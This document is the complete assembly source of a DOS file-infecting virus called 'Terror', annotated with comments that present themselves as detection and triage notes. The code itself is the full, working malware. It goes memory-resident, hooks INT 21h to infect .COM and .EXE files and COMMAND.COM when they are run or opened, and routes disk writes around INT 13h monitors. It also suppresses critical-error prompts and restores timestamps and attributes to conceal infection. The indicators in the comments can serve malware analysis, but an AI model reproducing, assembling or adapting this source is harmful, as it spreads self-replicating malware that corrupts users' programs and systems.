;**********************************************
;            Terror Virus
;**********************************************
; Analysis notes: 16-bit real-mode DOS code, MASM/TASM-style syntax, assembled
; as a .COM image (ORG 100h). The comments describe observed behaviour for
; detection and triage; no instruction has been changed.
Code		Segment
		Assume	CS:Code
		Org	100h
		
Start:		jmp	short Begin	; skip the data stored at the front of the body
; Per-DOS-version address pairs selected in Install (3.10, 3.20, 3.30).
; Word 0 is loaded into DX before the INT ECh vector is set; word 1 becomes
; the offset half of True13 (segment 0070h).
Table310	dw	12E4h,09ABh
Table320	dw	138Dh,17D0h
Table330	dw	1460h,0F7Ah
; 24-byte buffer. InfectHandle reads a target's first 24 bytes into it, and
; StartFile/ExeFileStart read it back to return control to the host program.
FileBytes	dw	12 dup (9090h)
; Path handed to InfectName by Find1st; the drive letter (byte 0) is patched
; at run time. GetAttr compares file names against the text at offset 3.
ComSpec		db	'A:\COMMAND.COM',0
; CheckEXE: tests the first word of FileBytes against both byte orders of the
; EXE header signature (4D5Ah and 5A4Dh).
; Out: ZF=1 if either matches, ZF=0 otherwise. No registers are written.
CheckEXE:	cmp	cs:FileBytes,4D5Ah
		je	IsEXE
		cmp	cs:FileBytes,5A4Dh
IsEXE:		ret
; Begin: entry point after the data. Records the PSP segment and asks whether
; a copy is already resident (INT 21h, AX=EC59h). The resident hook answers by
; copying AX into BP (see Respond), so BP == AX means "already installed".
; Falls through to StartFile when a resident copy answered.
Begin:		mov	word ptr cs:PSPSeg,ds	; DS = PSP segment at program start
		push	ax			; host's initial AX, popped in StartFile
		mov	ax,0EC59h		; residency probe value
		int	21h
		cmp	bp,ax
		jnz	Install			; no answer: go resident first
		push	cs
		pop	ds			; DS = CS for the copy in StartFile
; StartFile: hands control back to the host program. For a COM host, 13 bytes
; of FileBytes are copied to offset 100h of the PSP segment and execution
; continues there; an EXE host is dispatched to ExeFileStart.
; In: AX of the host on the stack, DS = CS.
StartFile:	pop	ax			; AX pushed at Begin
		mov	es,word ptr cs:PSPSeg
		call	CheckEXE
		je	ExeFileStart
		mov	cx,13			; 11-byte stub + 1 word (see ComHeader)
		mov	si,offset FileBytes
		push	es			; far-return target = PSP:0100h
		mov	di,100h
		push	di
	rep	movsb				; DS:SI -> ES:DI
		push	es
		pop	ds			; DS = PSP segment again
		retf				; continue in the host at PSP:0100h
; ExeFileStart: resumes an EXE host from the header copy held in FileBytes.
; Offsets 0Eh/10h/14h/16h of the EXE header are the initial SS, SP, IP and CS;
; the segment values are relocated by the load segment (PSP + 10h).
; In: ES = PSP segment.
ExeFileStart:	mov	si,es
		add	si,10h			; SI = load segment (PSP + 10h paragraphs)
		add	cs:FileBytes [16h],si	; relocate the saved CS in place
		add	si,cs:FileBytes [0Eh]	; SI = relocated SS
		mov	di,cs:FileBytes [10h]	; DI = saved SP
		push	es
		pop	ds			; DS = PSP segment
		cli				; no interrupts while SS:SP is switched
		mov	ss,si
		mov	sp,di
		sti
		jmp	dword ptr cs:FileBytes [14h]	; far jump to saved CS:IP
; Install: runs when no resident copy answered the probe.
;   1. Chooses the addresses for True13 and for a private DOS entry point,
;      from the version tables (DOS 3.10/3.20/3.30) or from the current
;      INT 13h vector on any other version.
;   2. Sets interrupt vector ECh; every later DOS call in the body uses
;      INT ECh rather than INT 21h.
;   3. Shrinks the host's memory block by 101 paragraphs, allocates 100
;      paragraphs, copies MovedSize bytes there and continues in the copy.
; Triage notes: a non-default INT ECh vector and a host memory block that is
; 101 paragraphs smaller than expected both follow from this routine.
Install:	mov	ah,30h			; DOS: get version (AL=major, AH=minor)
		int	21h
		mov	bx,offset Table310
		cmp	ax,0A03h		; version 3.10
		jne	Not310
		mov	ax,0070h
		mov	bx,0D43h
		mov	es,ax
		cmp	byte ptr es:[bx],2Eh	; byte at 0070:0D43 is a CS prefix?
		jne	SetVectors
		mov	ax,bx
		jmp	short SetV1
Not310:		add	bx,4			; BX -> Table320
		cmp	ax,1403h		; version 3.20
		je	SetVectors
		add	bx,4			; BX -> Table330
		cmp	ax,1E03h		; version 3.30
		je	SetVectors
		mov	ax,3513h		; other versions: read the INT 13h vector
		int	21h
		mov	word ptr cs:True13,    bx
		mov	word ptr cs:True13 + 2,es
		mov	ax,3521h
		mov	dx,bx			; DX = offset returned for INT 13h
		jmp	short Set21
SetVectors:	mov	ax,word ptr cs:[bx+2]	; table word 1 -> True13 offset
SetV1:		mov	dx,word ptr cs:[bx]	; table word 0 -> DX for the 25ECh call
		mov	word ptr cs:True13,ax
		mov	word ptr cs:True13 + 2,0070h
		mov	ah,34h			; DOS: get InDOS flag address (ES:BX)
		int	21h
Set21:		push	es
		pop	ds
		mov	ax,25ECh		; DOS: set vector ECh to DS:DX
		int	21h
		mov	ax,word ptr cs:PSPSeg
		mov	es,ax
		dec	ax
		mov	ds,ax			; DS = paragraph before the PSP (its MCB)
		mov	bx,word ptr ds:[3]	; block size in paragraphs
		sub	bx,101
		add	ax,bx
		mov	word ptr es:[0002h],ax	; Setup PSP memory size.
						; Command.COM needs that
						; action; else the system
						; hangs.
		mov	ah,4Ah			; DOS: resize block ES to BX paragraphs
		int	0ECh
		mov	bx,100
		mov	ah,48h			; DOS: allocate BX paragraphs, AX = segment
		int	0ECh
		sub	ax,10h			; so that offset 100h lands on the block start
		mov	es,ax
		mov	byte ptr ds:[0000h],5Ah	; This is the last block,
						; don't you think so?
						; (writes 'Z' at offset 0 of the host's MCB)
		push	cs
		pop	ds
		mov	si,100h
		mov	di,si
		mov	cx,MovedSize
	rep	movsb				; copy the body to the new block
		mov	di,offset Continue
		push	es
		push	di
		retf				; resume at Continue inside the copy
; Continue: first code executed in the relocated copy. Saves the current
; INT 21h vector in Saved21, installs Int21 as the new handler, clears the
; Handles table and then returns control to the host via StartFile.
; In: ES = allocated segment - 10h, CS = same value.
Continue:	mov	word ptr es:[0F1h],0070h	; ES:00F1h is offset 1 of the paragraph
						; before the allocated block - presumably
						; the owner field of its MCB; TODO confirm
		mov	ax,3521h		; get INT 21h vector -> ES:BX
		int	0ECh
		mov	word ptr cs:Saved21,    bx
		mov	word ptr cs:Saved21 + 2,es 
		mov	ah,25h			; AL still 21h: set INT 21h to DS:DX
		mov	dx,offset Int21
		push	cs
		pop	ds
		int	0ECh
		push	cs
		pop	es
		mov	di,offset Handles
		mov	cx,25
		mov	al,0
	rep	stosb				; zero the 25-byte Handles table
		jmp	StartFile
; Respond: answer to the residency probe (INT 21h, AX=EC59h). Copies AX into
; BP and returns without chaining to DOS. A clean system is not expected to
; return BP == AX for this call, which makes the probe usable as a
; memory-resident indicator.
Respond:	mov	bp,ax
		iret
; Int21: resident INT 21h hook. Requests it acts on:
;   AX=EC59h  residency probe            -> Respond
;   AX=4B00h  load and execute program   -> Exec
;   AH=3Dh    open file                  -> Open
;   AH=3Eh    close file                 -> Close
;   AH=11h    FCB find-first whose byte at DS:[DX+6] is 08h -> Find1st
; Anything else chains to the previous handler through a hand-assembled far
; jump: opcode EAh followed by the Saved21 dword as its operand.
Int21:		cmp	ax,0EC59h
		je	Respond
		cmp	ax,4B00h
		je	Exec
		cmp	ah,3Dh
		je	Open
		cmp	ah,3Eh
		je	Close
		cmp	ah,11h
		jne	End21
		push	di
		mov	di,dx
		cmp	byte ptr ds:[di+6],08	; Volume ID attributes
		je	Find1st
EndF1st:	pop	di
End21:		db	0EAh			; JMP FAR opcode; operand is Saved21
Saved21		dd	?			; previous INT 21h vector (set in Continue)
; Exec: on load-and-execute (AX=4B00h) the program named at DS:DX is passed
; to InfectName before the request is forwarded to the previous handler.
Exec:		call	InfectName
		jmp	End21
; Open: on AH=3Dh, files accepted by GetAttr (.COM/.EXE names) whose attribute
; word is exactly 20h are opened through the previous handler with the access
; mode forced to 2 (read/write). The Command? value computed by GetAttr is
; stored in Handles[handle] so that Close can recognise the handle later.
; All other opens are chained unchanged.
OpenEnd:	pop	cx
		jmp	End21
Open:		push	cx
		call	GetAttr			; CF=1: not a candidate; CX = attributes
		jc	OpenEnd
		cmp	cx,20h			; attributes exactly 20h (archive only)?
		pop	cx
		jne	End21
		mov	al,2			; force access mode read/write
		pushf
		call	dword ptr cs:Saved21	; simulated INT to the previous handler
		jc	Err21
		push	ax
		push	bx
		mov	bx,ax			; BX = handle returned by DOS
		mov	al,byte ptr cs:Command?
		mov	byte ptr cs:Handles [bx],al	; tag the handle (1 or 2)
		pop	bx
		pop	ax
Err21:		retf	2			; return to caller, keeping current flags
; Close: on AH=3Eh for a handle tagged in Handles, the handle is duplicated
; (AH=45h), the caller's close is carried out by the previous handler, and the
; duplicate is then passed to InfectHandle between SetV and Restore.
; Untagged handles are chained unchanged.
; In: BX = handle being closed.
Close:		cmp	byte ptr cs:Handles [bx],0
		jz	End21
		push	ax
		mov	al,byte ptr cs:Handles [bx]
		mov	byte ptr cs:Command?,al	; restore the tag saved by Open
		mov	byte ptr cs:Handles [bx],0
		mov	ah,45h			; DOS: duplicate handle BX -> AX
		int	0ECh
		mov	word ptr cs:TempHandle,ax
		pop	ax
		jc	End21
		pushf
		call	dword ptr cs:Saved21	; perform the caller's close
		jc	Err21
		push	bx
		mov	bx,word ptr cs:TempHandle
		push	ds
		call	SetV			; temporary INT 13h / INT 24h handlers
		call	InfectHandle
		call	Restore
		pop	ds
		pop	bx
		clc
		retf	2			; report success to the caller
; Find1st: reached from Int21 for an FCB find-first whose byte at offset 6 is
; 08h. Builds the COMMAND.COM path for the drive in the byte at offset 7
; (0 = current drive, in which case the "A:" prefix is skipped) and passes it
; to InfectName, then resumes the original request at EndF1st.
; In: DS:DI = caller's FCB. AX, DX and DS are preserved.
Find1st:	push	ax
		push	dx
		push	ds
		mov	al,byte ptr ds:[di+7]	; drive number from the FCB
		mov	dx,offset Comspec
		or	al,al
		jz	CurrentDrive
		add	al,'A'-1		; 1 -> 'A', 2 -> 'B', ...
		mov	byte ptr cs:Comspec,al	; patch the drive letter
		jmp	short Infect1st
CurrentDrive:	add	dx,2			; DX -> '\COMMAND.COM'
Infect1st:	push	cs
		pop	ds			; DS:DX = path inside the resident copy
		call	InfectName
		pop	ds
		pop	dx
		pop	ax
		jmp	EndF1st
; InfectName: processes a file given by name.
; In:  DS:DX = ASCIIZ path.
; Steps: GetAttr filters the name and returns the attributes in CX; the
; attributes are cleared (AX=4301h, CX=0); the file is opened read/write
; (AX=3D02h); InfectHandle runs on the handle; the saved attributes are
; written back. SetV/Restore bracket the file operations.
; AX, BX and CX are preserved.
; Triage note: attributes are restored afterwards, so read-only/hidden/system
; bits on a file are not evidence that it was left untouched.
InfectName:	push	ax
		push	bx
		push	cx
		call	GetAttr
		jc	EndIN0			; not a candidate, or attribute read failed
		push	cx			; original attributes
		push	ds
		call	SetV			; returns with DS = CS
		pop	ds
		mov	ax,4301h		; DOS: set attributes
		xor	cx,cx			; ... to 0
		int	0ECh
		jc	EndIN1
		mov	ax,3D02h		; DOS: open read/write
		int	0ECh
		mov	bx,ax
EndIN1:		pop	cx			; original attributes (flags unchanged by POP)
		jc	EndInfName
		call	InfectHandle
		mov	ax,4301h		; write the original attributes back
		int	0ECh
EndInfName:	call	Restore
EndIN0:		pop	cx
		pop	bx
		pop	ax
		ret
; SetV: saves the current INT 13h and INT 24h vectors in Old13/Old24 and
; installs Int13 and Critical in their place for the duration of one file
; operation. AX, BX, DX and ES are preserved; DS is left equal to CS, so
; callers save DS themselves.
SetV:		push	ax
		push	dx
		push	bx
		push	es
		mov	ax,3513h		; get INT 13h vector -> ES:BX
		int	0ECh
		mov	word ptr cs:Old13,bx
		mov	word ptr cs:Old13+2,es
		mov	al,24h			; AL = 24h for the next get-vector call
		int	0ECh
		mov	word ptr cs:Old24,bx
		mov	word ptr cs:Old24+2,es
		pop	es
		pop	bx
		push	cs
		pop	ds
		mov	dx,offset Critical
		mov	ah,25h			; set INT 24h (AL still 24h) to CS:Critical
		int	0ECh
		mov	dx,offset Int13
		mov	al,13h			; set INT 13h to CS:Int13
		int	0ECh
		pop	dx
		pop	ax
		ret
; InfectHandle: works on an open read/write handle and closes it on exit.
; In:  BX = file handle; Command? = 1 or 2 as set by GetAttr (2 = the name
;      matched COMMAND).
; All of AX, CX, DX, SI, DI and DS are preserved.
; Observed behaviour, useful for detection and cleanup:
;   - Marker: the last 6 bytes of the file are read and the first two compared
;     with 'T','e'. Every written body ends with the string ' Terror', so a
;     file ending in "Terror" is treated as already processed.
;   - The first 24 bytes of the file are read into FileBytes before the body
;     is written, so the written copy carries the host's original header.
;   - Non-EXE files are accepted only when 1024 <= size <= 64000 bytes.
;   - The body is written on a 16-byte boundary; EXE header fields 02h, 04h,
;     0Eh, 10h, 14h and 16h are rewritten, COM files get the ComHeader stub.
;   - The file date/time is read and written back (AX=5700h/5701h), so the
;     timestamp is not a reliable indicator of modification.
InfectHandle:	push	ax
		push	cx
		push	dx
		push	si
		push	di
		push	ds
		mov	di,offset FileBytes
		mov	cx,0FFFFh
		mov	dx,-6
		mov	ax,4202h		; seek to end-of-file minus 6
		int	0ECh
		mov	ah,3Fh			; read 6 bytes into FileBytes
		mov	cx,6
		push	cs
		pop	ds
		mov	dx,di
		int	0ECh
		jc	EndH1
		cmp	word ptr cs:[di],'eT'	; marker bytes 'T','e' already present?
		je	EndH1
		xor	cx,cx
		xor	dx,dx
		mov	ax,4200h		; seek to start of file
		int	0ECh
		mov	ah,3Fh			; read the first 24 bytes into FileBytes
		mov	cx,24
		mov	dx,di
		int	0ECh
		jnc	ReadOk
EndH1:		jmp	EndInfHandle
ReadOk:		xor	cx,cx
		xor	dx,dx			; default: seek offset 0 from end of file
		cmp	byte ptr cs:Command?,2
		jne	Seek
		cmp	word ptr ds:[di+1],4000h	; Is there some
							; another virus
							; in the stack?
		ja	EndH1
		dec	cx			; CX:DX = -(VirusSize+64): for the COMMAND
		mov	dx,-(VirusSize+64)	; case the seek lands inside the file
Seek:		mov	ax,4202h		; seek relative to end; DX:AX = position
Seek1:		int	0ECh
		test	ax,000Fh		; position on a paragraph boundary?
		jz	SeekOk
		mov	cx,dx
		mov	dx,ax
		add	dx,10h
		and	dl,0F0h			; round up to the next multiple of 16
		mov	ax,4200h		; absolute seek to the rounded position
		jmp	Seek1
SeekOk:		call	CheckEXE
		je	SkipEXE
		or	dx,dx			; non-EXE: position must fit in 16 bits
		jnz	EndH1
		cmp	ax,1024
		jnb	MayBeGood?
		jmp	EndInfHandle
MayBeGood?:	cmp	ax,64000
		ja	EndInfHandle
SkipEXE:	mov	cl,4
		shr	ax,cl
		mov	si,ax
		mov	cl,12
		shl	dx,cl
		add	si,dx			; SI = write position in paragraphs
		mov	ah,40h			; write VirusSize bytes from DS:0100h
		mov	dx,100h
		mov	cx,VirusSize
		int	0ECh
		jc	EndInfHandle
		call	CheckEXE
		jne	ComFile
		sub	si,10h
		sub	si,word ptr cs:[di+08h]	; minus header size in paragraphs
		mov	word ptr cs:[di+14h],100h	; header IP
		mov	word ptr cs:[di+16h],si	; header CS
		mov	word ptr cs:[di+10h],400h	; header SP
		add	si,VirusSize / 16 + 1
		mov	word ptr cs:[di+0Eh],si	; header SS
		mov	ax,4202h		; seek to end: DX:AX = new file length
		xor	cx,cx
		xor	dx,dx
		int	0ECh
		mov	cx,200h
		div	cx			; AX = length / 512, DX = remainder
		or	dx,dx
		jz	DontAdjust
		inc	ax			; partial last page counts as a page
DontAdjust:	mov	word ptr cs:[di+02h],dx	; header: bytes in last page
		mov	word ptr cs:[di+04h],ax	; header: page count
		jmp	short Common
ComFile:	push	si
		push	di
		push	es
		push	cs
		pop	es
		mov	si,offset ComHeader
		mov	cx,11
	rep	movsb				; FileBytes[0..10] = ComHeader stub
		pop	es
		pop	di
		pop	ds:[di+11]		; FileBytes[11..12] = saved SI (paragraphs)
Common:		mov	ax,4200h		; seek to start of file
		xor	cx,cx
		xor	dx,dx
		int	0ECh
		mov	ah,40h			; write the 24 bytes of FileBytes
		mov	cx,24
		mov	dx,di
		int	0ECh
EndInfHandle:	mov	ax,5700h		; get file date/time -> CX, DX
		int	0ECh
		mov	al,1			; AX = 5701h: set the same date/time
		int	0ECh
		mov	ah,3Eh			; close the handle
		int	0ECh
		pop	ds
		pop	di
		pop	si
		pop	dx
		pop	cx
		pop	ax
		ret
; Restore: counterpart of SetV. Writes the Old13 vector back to INT 13h via
; AX=2513h. The Old24 vector is then loaded into DS:DX with AL=24h, but no
; INT ECh follows before the registers are popped, so only the INT 13h vector
; is written back in the visible code.
; AX, DX and DS are preserved.
Restore:	push	ax
		push	dx
		push	ds
		mov	ax,2513h		; set INT 13h to DS:DX
		mov	dx,word ptr cs:Old13
		mov	ds,word ptr cs:Old13+2
		int	0ECh
		mov	al,24h
		mov	dx,word ptr cs:Old24
		mov	ds,word ptr cs:Old24+2
		pop	ds
		pop	dx
		pop	ax
		ret
; GetAttr: filters a file name and fetches its attributes.
; In:  DS:DX = ASCIIZ path (the terminating zero is searched within 64 bytes).
; Out: CF=1 if the name does not end in .COM or .EXE (case-insensitive), or if
;      the attribute call failed; otherwise CF=0 and CX = file attributes.
;      Command? = 2 when the 7 characters before the dot match "COMMAND"
;      (taken from Comspec+3), else 1.
; AX, BX, DI and ES are preserved.
; Word constants such as 'MO' hold the first listed character in the high
; byte, so they match the bytes 'O','M' as they appear in memory.
GetAttr:	push	ax
		push	es
		push	di
		push	bx
		mov	di,dx
		push	ds
		pop	es
		mov	al,0
		mov	cx,64
	repne	scasb				; DI -> byte after the terminating zero
		mov	ax,word ptr ds:[di-3]	; last two characters of the extension
		mov	cx,word ptr ds:[di-5]	; '.' and first character of the extension
		and	ax,5F5Fh		; Upcase extension
		and	ch,5Fh
		cmp	ax,'MO'
		jne	Exe?
		cmp	cx,'C.'
		je	CommandChk
ErrAttr:	stc
		jmp	short EndAttr
Exe?:		cmp	ax,'EX'
		jne	ErrAttr
		cmp	cx,'E.'
		jne	ErrAttr
CommandChk:	mov	cx,7			; compare 7 characters before the dot
		mov	bx,-1
Loop0:		inc	bx
		mov	al,byte ptr ds:[bx+di-12]
		and	al,5Fh			; upcase
		cmp	al,byte ptr cs:Comspec [bx+3]
		loope	Loop0
		mov	al,1			; MOV leaves ZF from the last compare intact
		jne	NoCommand
		mov	al,2
NoCommand:	mov	byte ptr cs:Command?,al
		mov	ax,4300h		; DOS: get attributes of DS:DX -> CX
		int	0ECh
EndAttr:	pop	bx
		pop	di
		pop	es
		pop	ax
		ret
; Critical: temporary INT 24h (critical error) handler installed by SetV.
; Returns AL=3 without prompting, so a failing disk operation (for example on
; write-protected media) produces no "Abort, Retry" message for the user.
Critical:	mov	al,3
		iret
; Int13: temporary INT 13h handler installed by SetV. Requests with AH=03h
; (write sectors) are sent to True13, the address chosen in Install; all other
; requests go to Old13, the handler that was active before SetV. Both jumps
; are hand-assembled: opcode EAh followed by the dword that serves as operand.
; Defensive note: a monitor that only hooks the INT 13h vector does not see
; the AH=03h calls routed through True13.
Int13:		cmp	ah,3
		jz	Skip13
		db	0EAh	; JMP Far
Old13		dd	?	; INT 13h vector saved by SetV
Skip13:		db	0EAh	; JMP Far
True13		dd	?	; set in Install
; 11-byte stub that InfectHandle writes over the start of a COM file, followed
; by one word it fills in. The bytes decode as:
;   50           push ax
;   8C C8        mov  ax,cs
;   01 06 0B 01  add  [010Bh],ax
;   58           pop  ax
;   EA 00 01     jmp  far ptr with offset 0100h (segment = the following word)
; A COM file starting with this byte sequence is a static indicator.
ComHeader	db	50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
; Marker string: the last bytes of every written body, and therefore of the
; file when the body is written at its end. InfectHandle checks for it.
Terror		db	' Terror'
VirusEnd	label	byte
VirusSize	=	offset VirusEnd - offset Start	; bytes written to a file
; Everything below is run-time storage that is not written to files.
Old24		dd	?		; INT 24h vector saved by SetV
TempHandle	label	word		; shares storage with PSPSeg
PSPSeg		dw	?		; PSP segment saved at Begin
MovedSize	=	$ - offset Start	; bytes copied to the resident block
Handles		db	25 dup (?)	; per-handle tag, indexed by file handle
Command?	db	?		; 1 = ordinary COM/EXE name, 2 = COMMAND
Code		EndS
		End	Start
--------------------------------------------------------------------------